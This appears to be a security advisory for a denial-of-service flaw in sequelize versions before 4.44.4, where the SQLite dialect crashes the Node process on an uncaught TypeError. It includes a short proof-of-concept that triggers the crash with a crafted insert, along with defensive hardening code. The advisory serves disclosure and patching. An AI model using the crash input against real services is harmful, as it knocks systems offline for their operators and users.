GHSA-fw4p-36j9-rrj3 – sequelize
Package
Manager: npm
Name: sequelize
Vulnerable Version: >=0 <4.44.4
Severity
Level: Medium
CVSS v3.1: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L/E:P/RL:U/RC:C
CVSS v4.0: CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
EPSS: N/A (percentile: N/A)
Details
Denial of Service in sequelize

Versions of `sequelize` prior to 4.44.4 are vulnerable to Denial of Service (DoS). The SQLite dialect does not handle the case where the `results` variable is undefined: calling `.map` on it throws a `TypeError` that is never caught. This allows attackers to submit crafted input that forces the exception and crashes the Node process.

The following proof-of-concept crashes the Node process:

```javascript
const Sequelize = require('sequelize');

const sequelize = new Sequelize({
  dialect: 'sqlite',
  storage: 'database.sqlite'
});

// The model is deliberately named after the exception it triggers.
const TypeError = sequelize.define('TypeError', {
  name: Sequelize.STRING,
});

TypeError.sync({ force: true }).then(() => {
  // The inserted value is chosen so the dialect takes a code path in which
  // `results` is undefined; the subsequent `.map` call throws and the process exits.
  return TypeError.create({ name: "SELECT tbl_name FROM sqlite_master" });
});
```

## Recommendation

Upgrade to version 4.44.4 or later.
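The bug class behind this advisory (CWE-248, uncaught exception) can be shown with a small model of the dialect's callback-based query handler. This is an added example, not Sequelize's own code: it assumes a driver with an `all(sql, cb)` callback interface that yields `undefined` results for statements that produce no result set, and contrasts an unguarded handler with a hardened one that treats missing results as zero rows and converts any throw inside the callback into a promise rejection rather than an `uncaughtException`.

```javascript
// Naive handler: assumes the driver always supplies an array.
// With results === undefined this throws a TypeError.
function formatRowsNaive(results) {
  return results.map(row => ({ ...row }));
}

// Hardened handler: a missing result set is treated as zero rows.
function formatRowsSafe(results) {
  if (!Array.isArray(results)) return [];
  return results.map(row => ({ ...row }));
}

// Wraps a callback-style driver call. The driver invokes the callback after the
// Promise executor has already returned, so a throw inside it is NOT caught by
// the Promise machinery; the try/catch turns it into a rejection the caller can
// handle instead of an 'uncaughtException' that terminates the process.
function runQuery(driver, sql, formatRows) {
  return new Promise((resolve, reject) => {
    driver.all(sql, (err, results) => {
      if (err) return reject(err);
      try {
        resolve(formatRows(results));
      } catch (e) {
        reject(e);
      }
    });
  });
}

// Constructed stand-in driver (assumption): SELECTs yield rows, anything else
// yields undefined, mirroring the condition the advisory says went unguarded.
const fakeDriver = {
  all(sql, cb) {
    const rows = /^\s*select/i.test(sql) ? [{ tbl_name: 'TypeErrors' }] : undefined;
    setImmediate(() => cb(null, rows));
  },
};

// Helper used to demonstrate (and test) that the naive path throws a TypeError.
function naiveThrowsTypeError(results) {
  try {
    formatRowsNaive(results);
    return false;
  } catch (e) {
    return e instanceof TypeError;
  }
}

// Demo: the hardened path survives an INSERT that returns no result set.
runQuery(fakeDriver, 'INSERT INTO t (name) VALUES (?)', formatRowsSafe)
  .then(rows => console.log('rows:', rows))      // rows: []
  .catch(err => console.error('handled:', err.message));
```

Swapping `formatRowsSafe` for `formatRowsNaive` in the demo still keeps the process alive, because the wrapper routes the `TypeError` to `.catch()`; without the wrapper's try/catch it would crash the process exactly as the advisory describes.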
Metadata
Created: 2020-09-03T20:25:33Z
Modified: 2020-08-31T18:48:48Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-fw4p-36j9-rrj3/GHSA-fw4p-36j9-rrj3.json
CWE IDs: ["CWE-248"]
Alternative ID: N/A
Finding: F140
Auto approve: 1